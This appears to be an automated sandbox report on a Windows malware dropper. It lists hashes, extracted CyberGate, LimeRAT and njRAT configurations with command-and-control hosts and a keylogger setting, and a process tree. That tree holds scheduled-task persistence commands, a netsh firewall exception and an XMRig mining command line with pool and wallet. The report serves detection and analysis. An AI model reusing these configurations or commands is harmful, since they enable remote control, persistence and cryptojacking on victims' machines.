Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
25-05-2022 01:11
Static task
static1
Behavioral task
behavioral1
Sample
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Resource
win7-20220414-en
General
-
Target
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
-
Size
12.1MB
-
MD5
dfd75a7bf3505b1451149b8d73a359ae
-
SHA1
8db9aa88468ce61ffa43eaa195aff0eb359310b6
-
SHA256
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
-
SHA512
2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
Malware Config
Extracted
cybergate
v1.05.1
noIP
red4.hopto.org:1552
8RJNIFAYVRO133
-
enable_keylogger
true
-
enable_message_box
false
-
ftp_directory
./logs/
-
ftp_interval
30
-
injected_process
explorer.exe
-
install_dir
SkypeUpdate
-
install_file
Skype.exe
-
install_flag
false
-
keylogger_enable_ftp
false
-
message_box_caption
Remote Administration anywhere in the world.
-
message_box_title
CyberGate
-
password
12345
-
regkey_hkcu
Adobefinder
Extracted
limerat
1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty
-
aes_key
nulled
-
antivm
true
-
c2_url
https://pastebin.com/raw/TFJdDnm6
-
delay
33
-
download_payload
false
-
install
false
-
install_name
Wservices.exe
-
main_folder
Temp
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Extracted
njrat
0.7d
noipchiper
red4.hopto.org:5553
ede4594ea0284ffc20ba188f3b2099c0
-
reg_key
ede4594ea0284ffc20ba188f3b2099c0
-
splitter
|'|'|
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig \Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig -
Executes dropped EXE 22 IoCs
Processes:
moxia.EXEc.exeli4.exemoxiacyb.exen.exec.exeLegion Elite Proxies Grabber v1.exec.exec.exeEATLFEPWN.exeservice.exesessionmsg.exedata.exeservice.exeSystemProcess.exesessionmsg.exedata.exesessionmsg.exeservice.exeservice.exeSystemProcess.exesessionmsg.exepid process 1396 moxia.EXE 932 c.exe 1692 li4.exe 1820 moxiacyb.exe 1548 n.exe 1632 c.exe 592 Legion Elite Proxies Grabber v1.exe 1896 c.exe 1740 c.exe 956 EATLFEPWN.exe 572 service.exe 892 sessionmsg.exe 880 data.exe 336 service.exe 1192 SystemProcess.exe 700 sessionmsg.exe 2924 data.exe 2956 sessionmsg.exe 2936 service.exe 2996 service.exe 2988 SystemProcess.exe 3028 sessionmsg.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1632-142-0x0000000010410000-0x0000000010471000-memory.dmp upx behavioral1/memory/1896-147-0x0000000010410000-0x0000000010471000-memory.dmp upx behavioral1/memory/1896-156-0x0000000010410000-0x0000000010471000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
data.exen.exedata.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion data.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion data.exe -
Loads dropped DLL 26 IoCs
Processes:
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exemoxia.EXEc.exec.exec.exeEATLFEPWN.exepid process 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1396 moxia.EXE 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1396 moxia.EXE 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 932 c.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe 1632 c.exe 1896 c.exe 956 EATLFEPWN.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
moxia.EXEmoxiacyb.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" moxia.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" moxiacyb.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce moxia.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
RegSvcs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum RegSvcs.exe -
AutoIT Executable 40 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\li4.exe autoit_exe \Users\Admin\AppData\Local\Temp\li4.exe autoit_exe \Users\Admin\AppData\Local\Temp\li4.exe autoit_exe \Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe \Users\Admin\AppData\Local\Temp\n.exe autoit_exe \Users\Admin\AppData\Local\Temp\n.exe autoit_exe \Users\Admin\AppData\Local\Temp\n.exe autoit_exe \Users\Admin\AppData\Local\Temp\n.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe \Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\c.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\efsui\data.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\efsui\data.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\efsui\data.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Roaming\Spectrum\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe autoit_exe C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\li4.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\n.exe autoit_exe -
Drops file in System32 directory 2 IoCs
Processes:
data.exedata.exedescription ioc process File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 data.exe File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 data.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
c.exe4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exeli4.exen.exeservice.exesessionmsg.exeservice.exedata.exeservice.exesessionmsg.exeservice.exedescription pid process target process PID 932 set thread context of 1632 932 c.exe c.exe PID 1828 set thread context of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1692 set thread context of 1340 1692 li4.exe RegSvcs.exe PID 1548 set thread context of 932 1548 n.exe RegAsm.exe PID 572 set thread context of 1440 572 service.exe RegSvcs.exe PID 892 set thread context of 700 892 sessionmsg.exe sessionmsg.exe PID 336 set thread context of 2108 336 service.exe RegAsm.exe PID 880 set thread context of 2740 880 data.exe RegAsm.exe PID 2996 set thread context of 3036 2996 service.exe RegSvcs.exe PID 2956 set thread context of 3028 2956 sessionmsg.exe sessionmsg.exe PID 2936 set thread context of 2176 2936 service.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2488 schtasks.exe 2848 schtasks.exe 936 schtasks.exe 1388 schtasks.exe 1696 schtasks.exe 1460 schtasks.exe 2412 schtasks.exe 2528 schtasks.exe 2312 schtasks.exe 560 schtasks.exe 1128 schtasks.exe 1720 schtasks.exe 2504 schtasks.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
data.exen.exedata.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer data.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS data.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName data.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer n.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS data.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName data.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer data.exe -
NTFS ADS 1 IoCs
Processes:
n.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 n.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
c.exepid process 1896 c.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
c.exeEATLFEPWN.exeRegAsm.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 1896 c.exe Token: SeDebugPrivilege 1896 c.exe Token: SeLockMemoryPrivilege 956 EATLFEPWN.exe Token: SeLockMemoryPrivilege 956 EATLFEPWN.exe Token: SeDebugPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: SeDebugPrivilege 1340 RegSvcs.exe Token: SeDebugPrivilege 1340 RegSvcs.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe Token: 33 932 RegAsm.exe Token: SeIncBasePriorityPrivilege 932 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exemoxia.EXEc.exec.exedescription pid process target process PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 1396 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe moxia.EXE PID 1828 wrote to memory of 932 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 1828 wrote to memory of 932 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 1828 wrote to memory of 932 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 1828 wrote to memory of 932 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe c.exe PID 1828 wrote to memory of 1692 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 1828 wrote to memory of 1692 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 1828 wrote to memory of 1692 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 1828 wrote to memory of 1692 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe li4.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1396 wrote to memory of 1820 1396 moxia.EXE moxiacyb.exe PID 1828 wrote to memory of 1548 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 1828 wrote to memory of 1548 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 1828 wrote to memory of 1548 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 1828 wrote to memory of 1548 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe n.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 932 wrote to memory of 1632 932 c.exe c.exe PID 1828 wrote to memory of 592 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 1828 wrote to memory of 592 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 1828 wrote to memory of 592 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 1828 wrote to memory of 592 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe Legion Elite Proxies Grabber v1.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1828 wrote to memory of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe PID 1632 wrote to memory of 1896 1632 c.exe c.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\moxia.EXE"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1820 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 14⤵
- Creates scheduled task(s)
PID:1128
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 14⤵
- Creates scheduled task(s)
PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exeC:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 554⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"5⤵
- Executes dropped EXE
PID:1740
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\li4.exe"C:\Users\Admin\AppData\Local\Temp\li4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1692 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Maps connected drives based on registry
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\n.exe"C:\Users\Admin\AppData\Local\Temp\n.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- NTFS ADS
PID:1548 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:932 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE4⤵PID:972
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"2⤵
- Executes dropped EXE
PID:592
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:1388
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]1⤵PID:1108
-
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exeC:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:1440
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2412
-
-
-
C:\Users\Admin\AppData\Roaming\efsui\data.exeC:\Users\Admin\AppData\Roaming\efsui\data.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Enumerates system info in registry
PID:880 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2848
-
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:336 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2528
-
-
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exeC:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:892 -
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"3⤵
- Executes dropped EXE
PID:700
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2488
-
-
-
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exeC:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe2⤵
- Executes dropped EXE
PID:1192
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2936 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2176
-
-
